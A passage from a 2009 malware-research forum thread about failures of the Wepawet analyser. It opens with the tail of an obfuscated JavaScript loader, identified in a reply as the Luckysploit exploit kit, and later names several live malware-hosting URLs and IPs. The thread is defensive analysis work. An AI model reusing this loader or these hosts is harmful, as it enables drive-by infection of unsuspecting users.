y=';BSY='bs();var ';MGH='z=new UW';FEH='s[this.t++]=(x>>';ILO='b==16)k=4;else if(b=';HUM='.prototype.OBN=H';VYE='x){KFY[RWD++]^';ZUG='.length';LNB='50882';BZZ=')+"\\n";i+';IJT='.DB-sh))-1))<<sh;thi';BMM='&&r.PKM(A.FV';MOT='urn c}if(SEU&&(navi';DMT='_FP);A.pr';DOU=',sh=0;while(--i';CWC='i<this.m.t;++i){v';WMO='ITF()+7)>>';KQQ=')return r;var ';VSE='lse if(x<-1)th';KMQ='v;rr="0".charCo';ODX='on<"5"&&window.cr';OPI='=this.s-a.s;if(r!=0';XIE=');RWD';QSQ='is.S[j';SLI='l;this';POH='M))}function G';SWL='type.abs=KHO';MEI='(0);for(vv=10;vv<3';SWJ='=true;';RJU='&(d=thi';RIK='is[0]=x+DV;e';EJU='er"==typeof a)thi';BZU='while(--n>=0){var l=';MBG='(i=oil;i<256;i++)';ZFQ='ion VT';YSP='.t]+=x.a';LHJ='l<53;oil++)sss+=Str';NFS=' r}function KTQ(s,b)';BON='ffff|';XBB=' if(b';XEN='(x){var';OGH='F1)/g,e=1<<this.F';ZSZ='on UYK';ZIM='C;B=30}else if(S';FDY='}oil=0;funct';RQM='ype.VBX=YJG;F';SBZ='*l+((m&';NNB='{m=true;r=GJM(';ZIV='e.F2=2*B-BI_FP;var Z';GMP='is.S[this.j]=t;re';EQS='.CME=null}function I';HSN='r t=r;r=r2;r2=t';TSL='6;++i)';BYJ='N();if(mi)A.';IUF='xp(e,z)}A.proto';GGL='(r,r)}function U';HSE=')}function HBJ(a){';TRM='.QWB(this';FTF='.setPublic("983';JMH='otype.setPublic=I';DLG='n QYQ(n,r){for';OCX='W(j,t);r.EKV(t,';OCF='{';LQF='RHZ[rr++';SZX='g.fromCharCod';XTN='unction ';HNM='++]=x;else if(s';YGB=',w,j,c,';DVS='--);a';QCF='r){var i';ZEQ='++]=z.charCodeAt(t)';KNC='EKV(t,r)}A';PNW=' Array()';CRR='ZT(n,';KBM='f4c2d744e';ZMY='l)}function LGD(i,x';OVR='0xf)*y))&0xf';WOL='(d,d+1)';GRW='ff}ret';EJN='mpl+(((j*this.mp';VKG='.t>0)?(this[0]&1';KTB='<=0)re';KJX='document.';ING=')&255;if(RWD';OQO=';k+=';ZLG='=null;t';RPZ='urn r;return';MGZ='avigator.a';MTR='=x&255;KFY[RWD++]^';CMY='B-15))-';UBE=' RIP(){IKH(n';CNP='=QWX;function ';VWN='turn V';SCY='CR(N,E){if(N!=null&&';CSP='[--n]=0;';CRB='pe"&&na';KWL='LGD;B=26}else{A.p';SGM='+y.t;wh';IPV='0;r.OYN();i';ZTM='.next';YVC='oil=0;oi';YRM='])&255]}VX';CUC='ar i=a+1;i<this.';LDY='.DB*(this.t-1)+MWY(t';FXV='s.charCodeAt(i';PWW='23456789+/=";fu';TXY='Z(e,m){var z;';PQE='a;a=k;';XBY='%k;if(';DEI='[i]=this';DSY='b)|c;c=(this[i';HQY='his.n';SMD='i],r,2*i,0,1);r.s=0';IEX='r,i,0,x.t);r.s=';JGH='=this.DB}c-';YQQ='[a]>>';BPV='=n}retur';MHB='ZZ.prototype.';MDT='3);if(';QEM='[i];r[i++';ZJN='e(b.c';LFX='=2;a[--n]=0;';VPG='uncti';KQO='l+h*a;l=a*l+((m&0x';REW='this.S[i]+a[i%a.';MLW='rotot';RDX='type.';IYW=' ZSY.char';NLT='is.S[i];this.S';JVZ='FQV=EQY;UWR.proto';BIO='nextkey=res;var';YJB='on WWM(){if';XCK='type.exp=ZIX;A.proto';HMY='D++]^=(x>>16)&255;K';XDJ='[i]-a[i];r[i++]=c';LZR='totyp';OXI='et Explorer")){A.p';MPF='is.VBX(r)}f';XHS='eturn c';DZX=' r=nbi();x.abs().Y';HHG='0x10)return"0"+b.SL';MCT='b==32)k=5;else if(b';FVZ='ypto){var z=window.c';YOL='s.t>0&&this[this.t';LMF='type.DYC=NMQ;UWR.p';BZV='se if(c>0)r[i++]=';DLI='c!=64)';YQB=' QRQ(a){var r';BLG='turn x.mod(this.';NEV='r m=xh*l+h*a;l=a';ZEN='is.s<<a)';QNL='[e]=c;r.t=';OJZ='s.S[t';EXR='&x.DM;j=i+this.m.t;x';NVX='B=B;A.prototype.DM';YQZ='Y=PES();VHY.ini';EMR=' z=new FZZ(m);ret';XME='WCI(s,i){va';BPR='h+(x[i]';RZH='.OYN()}fu';UBF='0f78625c';DVR='a[--n]=x[0]';MXI='{var c=x.';ILB='s=(x<0)?-1:0;i';VLV='p<k){d=(this[i]&(';XSZ=';for(i=t';FHZ='>4)!=0){x=t;r';HUH='=nbv(0);A.ONE=nbv';UTQ=');if(ts!=ms)A.FVJ';QDI='is.DB-sh))-1)<';VMN='e(i<a.t){c-=a';WEX='>=0){v';EZK='V){r[i+x.t]-=';UHB='XKS=PWS;func';HLB='.t-1]|=(x&((1<<(this';WDM='(y,y);while(y.t<d)y[';TNO='r f=y[d-1];if(f';HOI='this.t+e+1;r.s=this.';LBG='t<this.t){c-=a.';DPX=',j,t;for(i=0;i<25';OCN=' RQL(r){var x=this.a';ETD='LQ;A.proto';JGL='ENT(r);this.VBX(r';UEH='=WEV;UWR.pro';FXB='x(this.t-n,0);r';MZY='r)}fun';UKE='this[i]&0x3f';MVQ=')+xh*h+(c>>>30);w';ZHR='m.t);';WVP='TT(y,r);th';GOS='f(r.t>0)r[r.t-1]+=x';VNH='|e<1)return A.ONE';HVH='c=(l>';ZOH='ile(--n>=0){var l=th';ZSJ='th.ma';HMR='bi(),g=z.DYC(this),i';VDY='s.mt2=2*m.t}f';HBI='r(var i=0;';QOR='[this.t-a-1]|';NTY='totype.QWB=QYQ;A';JEZ='s.t;va';KSO='totype';KLN=';b.TZY(r)}va';NPS='a,r)}f';FHK='>0){a.JZT';EXK=';this.S=new';EIP='++){';IYP=';--i)r[i]=';OUF='();var x=new';OSS='";for(i=';FSL=';r.t=i';FSE='==32)k=5;el';WEV='s<0&&r.PK';PXK='unction MLW(x){x.CIX';VMW='on UVT()';KKB='PES(){return new V';ESV='(i=n-1;i';DKH='.ENT=RQL;A.protot';LKG='.am=FBO;B=28}A';QTZ='-1]==c)--this';PJE='=Math.floor(6553';YQT='his.DB';TUN=',r,j,0,d))<k){y.YW';CLP='l)?-1:c}fu';YCN='ar r=nbi();A';XCR='=0;t<';VOD='b){k="";';GZP='urn x.EW';ZXP=';return r}fu';XIL='x>>1)!=0)';MXW='f((t=x>>>16)!=0){x=t';LDR='this.s<0)return"-"';UOM='0x4000000';LHC='3fff)<<14)+w[j]+c;';XUF=',r){x.ENT(r);';LOI='(VHY==null){RIP();VH';VVT='i=r.t=2*x.';MRJ='x){whil';LYB='i-->0)';JVD='FQV=HPJ;FZZ.protot';DRO=');if(r!=null)this.';SUW='=((1<<B)-1);A.';SRY='x>>15;wh';CRW='his[this.t';RLG='=null)q.VFO(0';TUJ='this.';RQY='K;A.prototype.V';WNK='&0xfffff';KNG='Z[rr++]=vv;rr';FDU=',r);thi';OQK='{if(p<this.DB&';NWQ='r[i]<--';YUQ=']=s[j];s[j';EDJ='var i=s.l';MDY='Array(';PKX='{d=(this[i]>>(p-';JKD=';this.j=0';MUI='}else this[thi';ZKL='i)=="-")mi';UZC='return a';GWB='<0){if(s.charAt(';NCP='nction HT';PWH='(i*this.DB)';QOD='.s=this.s}funct';CPN=',mi=false';GEY='nction UWR(m){thi';KDQ='YZabcde';IOB='s[this.t';RMJ='adbeefcafe';FPX='}function FBO(i,x,w,';UMQ=');w[j++]=v&0x3ff';CBH='n WWMs(a){var i';JFR=';if(sh==0)thi';EHG='r[i+e+1]=(this[i]>>';VQG='<sh}this.OY';DOF='&(1<<i))>0)';OVT='ar i=0;w';MPV='ngth>0){th';OTU='-a;var';CUV='pe.ITF=YSB;A.prot';THW=')k=1;else if(';JED='eAt(i%a.length))%25';BPP=']&d)<<a}for(i=e-1;';YDB='tion DLT(){r';QKT='.DB)sh-=this.DB}i';VNE='ument.bod';WUO=']=x}i=';FNC='WW(this.m.';KFX='BQY="ABCDEFGHIJ';LBU='0;this.';UBL=';r+=2}if((t=';ZET='am(i,x[i],r,2*i,0';BUE='>>15)*this.mp';XXC='}}return z.FQV(r)}';YWX='JJ(n,r)';QYE='V))%this.DV;';HNB='fff;var a=(j*this.';WGI='<a.t){if(q!';NNG='ff;var h=this[i+';ECB='|x.PKM(this.m';FOS='-MWY(a[a.t-1]);if(c';SVI='i=this.t;r=i-a.t;if';DBV='=nbi();var y=nbi(),t';WZH='=a.s}r.s=(c<0)?-1:';EYZ='th;++RWD)KFY[';JJV='n a+s.substring(i,s';RCV='rseInt(b/c));';OBO='PJ(x){var r=nbi();x.';PEI='arCod';TPU='[i]-a[i])!=0)ret';HGE='s)A.FVJ.EKV(r,';HFZ='FY[RWD++]=t&';TQV='OYN()}function T';HNS='2;var i=r.t,';RJZ='r p=this.DB-';FZN=' 0}function MW';EHN='}WFW.protot';BXB='FO=ZWO;A';JYZ='s.VBX(r)}FZZ.p';NKQ='.length>0&&E.le';JPK='harCod';ERU=');ci+';WZU='s.QZP(a,';LGZ='this.um=(1<<(m.D';DGT='turn;var b=this.ab';UUM='-i]==f)?';YKK='r a=m.abs();if(a.t';DLC='{var i';ECS='ar j=x[';JMI='nctio';NXV='oil;j=oil;';KSC='urn t';VCB='}x.OYN();x';KLK='2-x*y%this.D';BEV='his.i=0';QJQ='his.DB-b;var ';NQM='(1<<this';PWN='B(){if(this.t<=0)ret';MZJ='j=oil;for';OGN='ffffff);c=(l>';FQZ=';A.prototype.KSV=UYK';TWM='FZZ(m){t';RUM='.S[j];th';DYI=' Arra';IKL=' MII(a';GLI=');KFY[RWD+';TUI='>>30)+(m>>>15';CKD='{var a=n%';TRT='.QYW();thi';RPJ='his.t=';UJP='y()}func';SUR='[j]+c;';XTG='=Math.pow(2,BI';PNB='se if(b=';RBT='0x3fff,xh';GEU='}function';LWE='[this.i];this.S[this';DPM='{a+=Strin';HJW='+e)*d2);if((r[i]+=y';NGQ=':-y}function ';XFQ='b;for(v';FEM='h=this[i++]>>15;va';GCK='+=this.DB-k)}else';GQD='"}function HLQ(){v';FNI='Number(a,b,c);else i';XRW='(j+s[i])%';HOU='rototype';MTQ='s;r.OYN()}functi';ICY='f(this.s!=a.';RBJ='b.SLR(1';LLU='y.t++]=0;while(--j';KTE='his.i])&255;t=this.S';NFD='[x.t++]=0;fo';TFW='=a.substring';BLK='while(x[j]>=x';VVN='e(i>=0){if(';RID='-1]^(this.s&this.D';GGP='>>15;';PVI='Y(x){var r=1,t;i';GOU='+]=1;r.';RKO='ototype.ETT';IBG='j,t);if(r.PKM(t)>=0';CUR='ppName=="Netsca';BBD=';scriptT';SMO='.t=this.t';HKY=']=t}this.i=';QLC='=0;var t;if(n';CHV=',x)}function PWS(x';XKM='0;while(x[0]==0)b.Y';IFL='n(a.t,this.t)';ZTT='0)m=true;if(m)r+=GJM';YMU='s.from';CMO='var KFY;var RWD;f';WYR='xff:WCI(s,i);if(x';UPS='ipt")';OKR='his.DB;var c=t';KEG='}if(d>';OGB='ptTag);';POL='this[0];if((x&1)==';ZRQ='):this.s)==0';OIV='6789abcd';NME='k)r.EK';URG='y.appendChild(scri';DNQ='urn 0;return this';IFN='(var i=n;i<this.t';PBU='b%=c}}';PPI='(r,r2);if((e';NMS='){if(x.s<0|';TPH='XC()}var R';GUD='r);if(ts<0)A.FVJ.EKV';IID='BI(x);';HON='s=this.';HNO='{A.prototype.am=';QCN='unction IKH(';GIK='nction nb';JUY='n null';YPB='.F1)+((d>1)?y[d-2]>>';RXZ='-1;i>=0;--i)r[';QSC='null;this.q=nu';BJJ='=4)k=2;';VLI='r[i-a]=';MNJ='256;x=s[i];';QHB=';for(';FZK='n r}function YS';QYI='ZZ.prot';SIH='=(this.s&d)<<';WFX=';++i)a[i]=W';CDD=';++i)r[i-n]=this[i';YQS='{return PQE(a,b';JFW=';i++)s[i';FUF='Math.floor(75+Mat';RTP=',r){x.';BLX='SY="012345';SCS='CIX(a,n';GIP='f(a>=this.t){r';OQZ='unction ';UMS='deAt(0);fo';BXS='EU&&(navigator';WIF='tion XRX(a)';LTR='6)}function';ZGR='(n,r){';JYU='ype.CIX=FHD;A.pr';PBY=' a=(1<<k)-1,d,m=f';EZT='ype.YBI=WWMs;functio';YRD='f(b==null&&"string';SCT='t,r);r.CIX(thi';KWX='c="";for(y=0';EPP=' this.toRadix(b);var';WPU='ll)return null;';RLZ=')}if(KFY==null){KF';NYO='EC=25';BFX=';y<b.length;y++){';FIR='gator.appName=="Mi';MJE='(c,y);b.';NML=')>=0)re';WVV='.FVJ.EKV(this,r)';VYM='+=4}if((t=x>>2)!=0';IDW='this.DM:Math.fl';VTJ='+=k;if(sh>=this';RBM='BN().SLR(b);va';OUR='hile(RWD<REC){t';DLZ='y();while(n>2){x[0]=';CQE='efghijklmnopq';KUE='&this.';DGI='B;var b=t';IYT='(this.DB-sh))';IHR='RWD]=0;RWD=0}re';HHD='eAt(y)^s';FDK='=d;r.O';QLB='Key.proto';DQC='>0)?th';PLZ='R(m);else';OQX='=x.DV;x[++j]++}';JZG=',y=a.abs();var i=x.t';RKQ='s}else{';OSD='random(32);for(t';REF='his.e';JZT=';var h';IWE='f(x>0)this[0]=x;e';RRC='ype.DYC=IVS;F';VUS='rototype.am=IV';UXY='];r.t=Ma';WZO='d)}whil';NYT='ew Array();va';IYS='.prototype.D';TQM='64+BQY.indexOf';JNC='s[i]+a.ch';EXP='x=s[i];s[i';JBI='eturn((this';OWG='pe.FNV=DLT;A.proto';LQT='b)}function nbi(){re';ELW='&255}w';YCB='.i]=this.S[thi';MJP=';A.prototype.P';UIF='e return ';KLV='=k))&a;if(p';QRV='oor(r[i]*h+(r';OBE='x&3;y=(y*(2-(x&';CTZ='r k;if(';RFP='.m.t,x);if(x.P';GOT='HY.next()}functio';DXX='!="Ne';VTP='+this.O';SDD='for(i=oil;i<256';EQR='m,null,x)}fu';LPR='=ci};var m=LMO';OMJ='992751","10001"';DCP='de(pa';DQT='(c==nul';CCJ='otype.ZXK=FZI;FZZ';SJQ='=Math.floor';TED=';r+=16}';QXZ='1;this.';KGX='.t}function ';XUX=')*y))&0xff;y';OXV='ZP(a,256);else thi';KLI='ototype.F1=';MHV='s.length+11){ret';FWV='ew Date().getT';DJZ='his.d=null;this.p=';YUW='>=REC)RWD-';ZWD='="A".charCodeAt(';ZIY='j=i-d,t=(q==';ULN='s();if(b.t';XTC='v(i){var r=nbi();r.';DHM='KLMNOPQRS';VHB='if(';RYS='.prototype.JZ';NQS='c&this.DM;c>>=this.';NWW='0x7fff)<<15)+w[j]+(c';JMZ='i>=0;--i)r[i]=0;r';CSN='is[i]&0x7fff;var ';EVH='c+=this.s;whil';TWW='=0,c=0,m=Math.mi';YBM='s,ms=';HZG='RR(a){var r=nb';UXQ='alse,r="",i=thi';USP='{if(this.t<1)r';YXH='this.F2:0);var';GPQ='}functio';MJG='x.DV;r[i+x.t+1]=1}}i';FSI='*this[';DHS='is.DV-y';IJQ='c=Math.floor(v/';ZOR='turn new A(nul';JDV='ction';QTM='w[j++]=l&0xfffff';NVE=',r);retur';GSK='r c=RHZ[';BSC='e(x.t<=this.mt2)x';DPL='s.i+1)&255;this.j';EQP='this}fu';UPB='m==nu';XNR='){r[r.t+';WOS='i+1,c,x.t-i-1))>=x.D';LNM='s.s}functio';JHM='n BHF(a,';VGY='.S[(t+this.S[this.i';FRP='if((t=x>>8)!=0){';CUJ='nction KHO(';CCK='nction WEV(x,y,';FNK='s.substring(i,i+n';LYE='r d=y.t;va';CBU='turn this';GHS='=x>>14;';RII='=REC}function';BGC='64:c/4);if(';ZZQ='his.t;r.s=this.s}fu';RCB='i++]+w';PLG='t;++i){r[i-a-1]';JNK='b20094bded52ed';MGI='this.D';ZWW='i++)';XGP='+xh*h;';HGM='R(16);els';NTO='+n;r.s=thi';VXL='ar c=this.s';WWF='.t=0;return}';XKZ='56;++i){j=(j+';DTP='s.j];th';WXP='=MWY(e';SDV='his.s=-1;';DNM='this.S';FWX='r)}else{a.TZY(y)';EBC=')%256;j=';CCX='f;y=(y*(';HJB='or(i=0;i<d.length;i';HFP='fff}return c';DWX='l)retur';TTW='(n/this.DB),c=(th';GXP='ototy';LDO='if(e<256||m.FNV())';RRO='(1);function VXC(){t';UFJ='1;thi';RFF='his.doPublic';MHP='{return new A(';JHV='ype.QZP=KTQ;A.pro';KLT='ull){r.QWB(d,q';GCS='WX(){var t;';NRY='x[j]-';OMY='ZT(a,r){var i';BWJ='{var k;if(b==16)k';YUF='his.DB}if(a.';WHX='m);else return x}f';DHZ='ime()';RLS='.am(i,x[';LJZ='.am(0,k';UXR='|=(thi';VZW='l)&this.um)<<15))';DVT='g,d2=(1<<this.';QVY='b=0;c=1;f';KPQ='36;++vv)';LCK='At(n)}function ';QDY='rototype';BGY='TZY(r)';YFN='var b=new WFW';QGD='=this.t-1;i>=0;--i){';IUR='rototype.';ZBP='(r!=0)return r;whil';RLH='<y.t;++i)r[i+x.t]';SGX='type.VBX=MLW;UWR.p';HMX='n IVC(i,x,w,j,c,n)';SXW=' Arra';DXQ='WM()}function WFW(){';YSH='hile(i+n<s.le';KSM='ar x=(k==8)?s[i]&0';PKE='}r';EFP='6;';OYZ='{var a=x&0x7fff,xh=';JDP='(this.';ZGV='else{this.fromRad';WJD='z.length;++t)KFY[RWD';HCU='>=0;--i)r[i]=0;r';JZD='(E,16)}';LMT='d.charAt(i)=="\\';QVK='var b=n%t';KME='FY[RWD++]^=(x>>24';YNR='stuvwxyz01';GNT='is.s;var a=Math.floo';LPQ='t;while';XOO='<0)?this.OBN():';WSQ='255}R';NZN=' FZI(x,y,r){x.ETT(y';SFX='FVJ.EKV(this,this)';QNS='=VTZ;A.FVJ';NHS='}a[--n]';NPY='r){x.E';PPL='6);this.e';VYGLDW+=HCL+IKL+IDK+OSS+IVT+ZWW+YIZ+XXJ+ZUG+ERU+TFW+WOL+JEG+ZDF+KFX+DHM+BSJ+KDQ+IML+ZVH+YNR+PWW+CUH+BTF+MNF+QVY+HJB+EIP+VHB+DXK+RRI+LMT+ZYS+TQM+ZNG+VUG+BGC+DLI+DPM+CFK+DCP+RCV+PBU+UZC+FDY+OHD+VOD+TNX+ONS+PNW+OQO+PQE+SDD+JFW+TZC+MZJ+MBG+OCF+STK+JNC+PEI+JED+EFP+EXP+YUQ+WUO+NXV+KWX+BFX+JZL+EBC+XRW+MNJ+HWW+TSQ+OND+SZX+ZJN+JPK+HHD+TLC+HXU+PKE+XHS+GPQ+YEI+SSN+YQS+BTS+RMJ+WNK+TCJ+RYE+DMW+EJU+YMU+FNI+YRD+EMP+OXV+WZU+LQT+ZOR+ZMY+YGB+XDS+OIX+FSI+RCB+SUR+IJQ+UOM+UMQ+OJR+QOF+HMX+OYZ+SRY+ZOH+CSN+FEM+NEV+SBZ+NWW+VWI+OGN+TUI+MVQ+YDJ+HFP+FPX+MUT+RBT+GHS+BZU+UKE+NNG+RVS+KQO+LHC+HVH+CYM+XGP+QTM+GRW+MOT+FIR+OSR+OXI+VUS+ZIM+BXS+POE+DXX+FOW+HNO+KWL+QDY+LKG+IYS+NVX+SUW+JSP+GEK+ZUU+XTG+DMT+KLI+HFM+ZIV+BLX+OIV+CQE+JJH+VZX+LFB+KMQ+UMS+XPB+WWZ+NDW+MEI+DGM+KNG+ZWD+IUO+KPQ+LQF+TCU+FDM+IYW+LCK+XME+GSK+HBW+RBQ+CLP+NCP+ZLM+MWV+IYP+RZE+ZZQ+BHB+RPJ+QXZ+ILB+IWE+VSE+RIK+HZI+GIK+XTC+QCE+NFS+BWJ+ONI+URW+QFJ+MSU+LWW+XBB+FSE+PNB+BJJ+ZGV+LEN+WIG+EDJ+DJL+CPN+DOU+WEX+KSM+WYR+GWB+ZKL+SWJ+MVL+JFR+IOB+HNM+LDW+ZXB+HLB+IJT+FEH+IYT+MUI+HTW+VTJ+QKT+VTV+DPV+SDV+BPQ+JXG+QDI+VQG+BYJ+SFX+TTD+VXL+NCI+YOL+QTZ+KGX+FGF+LDR+VTP+RBM+CTZ+ILO+ENJ+THW+MCT+ELB+EPP+PBY+UXQ+JEZ+RJZ+PWH+XBY+LYB+OQK+RJU+HKN+NNB+WZO+VVN+VLV+KWW+MGC+OVO+GCK+PKX+KLV+GJZ+TUJ+QFC+KEG+ZTT+VDX+NUU+GQD+YCN+WVV+ZXP+CUJ+OCG+FET+XOO+EQP+SDU+YQB+OPI+KQQ+SVI+ZBP+PEB+TPU+RPZ+FZN+PVI+MXW+TED+FRP+UPM+FHZ+VYM+YZS+UBL+XIL+MNK+FZK+PWN+DNQ+LDY+CRW+RID+POH+CRR+QCF+XSZ+FPZ+RXZ+PWP+ESV+HCU+SMO+NTO+LNM+DLG+IFN+CDD+UXY+ZSJ+FXB+QOD+COR+YWX+CKD+MGI+DGI+YQT+OTU+HXF+MWM+SJQ+TTW+ZEN+KUE+LXL+QGD+EHG+DSY+BPP+JMZ+QNL+HOI+MTQ+ZSZ+ZGR+XQY+GNT+ZTX+GIP+WWF+QVK+OKR+QJQ+YOM+CGS+YQQ+XFQ+CUC+PLG+UXR+GHY+VLI+QBY+QOR+SIH+DIL+TQV+OMY+TWW+IFL+FJL+XDJ+LQK+YUF+LBG+MFR+BOT+SEG+NQS+TBB+RKQ+EVH+VMN+QEM+SGZ+JGH+WZH+BHT+QJH+BZV+QYU+RZH+JMI+JHM+ISQ+JZG+FSL+SGM+FHP+PJF+RLH+TZF+IEX+IPV+ICY+HGE+MZY+JDV+OCN+BSY+VVT+LPQ+QPI+VMY+MXI+ZET+GHU+YSP+OIY+WOS+EZK+MJG+GOS+RLS+SMD+FRL+ZKS+YKK+KTB+DGT+ULN+WGI+RLG+DRO+BGY+PJB+DBV+HON+YBM+GUJ+FOS+FHK+MJE+RFC+FWX+KLN+LYE+TNO+BGG+NQM+YPB+YXH+HSX+DVT+OGH+HNS+ZIY+HOY+IBG+XNR+GOU+KNC+TJK+WDM+LLU+YTO+UUM+IDW+QRV+FXY+HJW+LJZ+TUN+OCX+VKZ+NWQ+NME+KCP+KLT+UTQ+ODG+FDK+NKE+GUD+GGL+HZG+KZL+SCS+FXI+BRJ+BMM+GPB+ULC+KHS+GEY+GQF+NMS+ECB+NML+BLG+WHX+OQZ+UYS+PXK+JDP+EQR+CCK+NPY+WVP+MPF+NWG+UPE+RTP+JGL+IVO+LMF+IUR+JVZ+SGX+UBP+UEH+KSO+YOS+VMW+USP+KUN+POL+JPI+ZBZ+OBE+OVR+IOY+QIG+XUX+DNG+MGN+TOH+CCX+KLK+QYE+GJS+DQC+DHS+NGQ+TWM+YJH+TRT+PWQ+GJY+YZN+GGP+LGZ+CMY+UFJ+VDY+ZPG+XEN+DZX+FNC+SCT+NRU+WEV+GUE+JJJ+NVE+VCY+OBO+CIB+ZVW+YSO+MRJ+BSC+NFD+HBI+CWC+ECS+XPY+HNB+EJN+BPR+BUE+VZW+EXR+VGF+MRR+VZS+ZHR+BLK+FNV+NRY+OQX+VCB+TRM+RFP+LHF+ROL+CHV+XUF+KDV+FVO+NZN+FDU+JYZ+MLW+RRC+MHB+JVD+RQM+QYI+CCJ+BJL+UHB+YDB+JBI+VKG+ZRQ+QXJ+ZSD+BON+VNH+QHF+HMR+WXP+PFL+DTX+MBC+PPI+DOF+UJR+VJE+HSN+XXC+RYD+ZFQ+TXY+LDO+MGH+PLZ+EMR+KSC+REF+IUF+RDX+GLJ+RQY+BXB+KRG+JHV+LZR+UVT+YQO+CXV+NTY+RYS+QXV+FQZ+QQH+MBV+RKO+HJM+DKH+JYU+WQY+GXP+OWG+XCK+MYI+HUM+ETD+SWL+MJP+HFO+CUV+WFO+DWB+QNS+HUH+RRO+BEV+JKD+EXK+DYI+UJP+WIF+DLC+DPX+TSL+DNM+LWH+UPU+XKZ+REW+OXN+NLT+DEI+RUM+QSQ+HKY+LBU+PSS+FDX+GCS+SMW+DPL+WUL+OJZ+KTE+LWE+YCB+DTP+GMP+CBU+VGY+YRM+DIB+LFN+ZTM+CNP+KKB+TPH+NYO+CVK+CMO+QCN+VYE+MTR+ESF+HMY+KME+ING+YUW+RII+UBE+FWV+DHZ+RLZ+SNI+MDY+XIE+QLC+MGZ+CUR+CRB+DBU+ODX+FVZ+EER+OSD+XCR+WJD+ZEQ+ELW+OUR+PJE+BDN+GLI+BKN+HFZ+WSQ+NKH+VPG+YJB+LOI+YQZ+ZNM+RLI+EYZ+IHR+VWN+GOT+CBH+QHB+TMW+WFX+DXQ+EHN+EZT+NMZ+MHP+NPS+XTN+WKO+OVT+YSH+GSH+FNK+BZZ+BPV+JJV+TKL+GEU+WBM+TTX+HHG+HGM+UIF+RBJ+LTR+XMU+MHV+ZSE+GPY+NYT+IFP+UML+FXV+DVS+CSP+YFN+OUF+SXW+DLZ+XKM+IID+DVR+NHS+LFX+YCZ+ZVQ+HQY+ZLG+SIS+DJZ+QSC+WZZ+BTD+ZSB+SLI+EQS+SCY+RQL+NKQ+MPV+IXP+PPL+BTH+JZD+BCK+SVJ+GZP+OKE+HSE+IPE+ILM+LPR+RCD+WMO+MDT+UPB+WPU+WGQ+RFF+WGF+DQT+DWX+JUY+JZT+POK+UZY+FDN+IRG+KVN+FIL+QLB+ZPF+JFJ+JMH+UYP+HOU+JID+POV+YVC+LHJ+LSO+FUF+TTE+IXQ+FTF+HZZ+UBF+HNZ+GNN+IRJ+LNB+KQJ+JNK+MJW+KBM+OMJ+YVF+MOI+BIO+YXZ+KJX+SUD+UPS+BBD+VIG+VNE+URG+OGB;OJOVLR(VYGLDW);</script></html>
Wepawet is returning "Invalid hostname." and Malzilla can't seem to decode it ........ :(
Title: Re: Wepawet issues
Post by: mercutio on May 07, 2009, 01:04:43 am
MysteryFCM,

The script you posted is decoded here:
http://wepawet.cs.ucsb.edu/view.php?hash=15db7e6dd281669c3f571942c75b3fcb&type=js
Luckysploit...

Regarding flash, I'll inquire with the "flash guy". I know that some work is under way, but I guess it will take time.

Title: Re: Wepawet issues
Post by: MysteryFCM on May 07, 2009, 01:26:39 am
Cheers :)
Title: Re: Wepawet issues
Post by: extrexploit on May 09, 2009, 02:29:18 pm
Hi guys,
Wepawet has a disclosure problem IMHO.
When an exploiter try to identify the configuration host probing activex version, browser version, plug in version and so on wepawet set this value in the same mode. This can useful for a botadmin because the response sent to exploiter support web site, it may be used for understand how react to attempts for automatic analysis. For example, if a common php stage of a malware spreading site recognize that the variables used by exploiter are valued with a schematic mode it can provide a fake page and made wrong result in terms of analysis . This only my point of view.
Feedback are welcome.
I have posted something about on my blog http://extraexploit.blogspot.com

Regards

Title: Re: Wepawet issues
Post by: SysAdMini on May 10, 2009, 06:12:46 pm
No detection

http://wepawet.cs.ucsb.edu/view.php?hash=b88d77827a836583e96f6e1e7fb6f454&t=1241979253&type=js
Title: Re: Wepawet issues
Post by: MysteryFCM on May 10, 2009, 08:16:48 pm
Say's it's benign but it infact, leads to a rogue;

http://wepawet.cs.ucsb.edu/view.php?hash=33f1ae9d7aaed00e905ac023cc06f39b&t=1241986710&type=js

Ref:
http://www.malwaredomainlist.com/forums/index.php?topic=2851.0
Title: Re: Wepawet issues
Post by: CkreM on May 11, 2009, 03:31:32 am
blank page:

http://wepawet.cs.ucsb.edu/view.php?hash=919fba4fa36b9a31919dc85c9fdce85e&t=1242012527&type=js
Title: Re: Wepawet issues
Post by: mercutio on May 12, 2009, 02:02:56 am
SysAdMini: from here 91.207.61.32/.r/.fi/index.php returns 404 and a benign error message.
The site is of course rather bad: http://wepawet.cs.ucsb.edu/domain.php?hash=6dbd5991176c36df9c0c505c04beba7e&type=js

MysteryFCM: I think the redirection will not be triggered unless the referer is "correct". Unfortunately, wepawet visits the page with an empty referer.

CkreM: yes, I really need to fix that. For now, I've just regenerated the report manually. Real fix coming in the next days, hopefully.
Title: Re: Wepawet issues
Post by: MysteryFCM on May 12, 2009, 01:32:40 pm
Depending on the method you're using, you should be able to set the referer? (or have an option to use one?)
Title: Re: Wepawet issues
Post by: SysAdMini on May 12, 2009, 03:32:18 pm
Wepawet is unable to analyze the pdf file at

Code: [Select]
hugetopnano.cn:8080/cache/readme.pdf
Not only the url fails. If I upload the pdf file then it fails too.
Title: Re: Wepawet issues
Post by: B_H on May 12, 2009, 06:29:03 pm
why wepawet can not analyze url with user pass ? for illegal policy ?! i have seen some url include user pass and hosted malware .
Title: Re: Wepawet issues
Post by: MysteryFCM on May 12, 2009, 07:36:08 pm
Wepawet is failing to analyse the URL's involved in the following;

http://hphosts.blogspot.com/2009/05/federal-reserve-goes-luckysploit.html

michajp posted some of the URL's to;

http://www.malwaredomainlist.com/forums/index.php?topic=2550.msg9710#msg9710
Title: Re: Wepawet issues
Post by: mercutio on May 12, 2009, 08:58:57 pm
SysAdMini: yeah, bug. Fixed:
http://wepawet.cs.ucsb.edu/view.php?hash=07ae80f2efd19ef8c6b5b0570cf4ab06&t=1242162153&type=js

B_H: yes, no https, no user/pass. If that becomes too much of a problem, it can be changed.
Title: Re: Wepawet issues
Post by: MysteryFCM on May 15, 2009, 11:06:03 am
Says invalid hostname;

time-for-mumpreneurs.site90.net\images\index.php

It's IP is actually: 64.235.47.65 (srv19.000webhost.com)

http://hosts-file.net/?s=time-for-mumpreneurs.site90.net
Title: Re: Wepawet issues
Post by: CkreM on May 15, 2009, 11:08:31 am
Says invalid hostname;

time-for-mumpreneurs.site90.net\images\index.php

It's IP is actually: 64.235.47.65 (srv19.000webhost.com)

http://hosts-file.net/?s=time-for-mumpreneurs.site90.net

worked for me and also many times in the past as it seems
http://wepawet.iseclab.org/domain.php?hash=449a2e524b30f201ae5d4c94d72ddd94&type=js

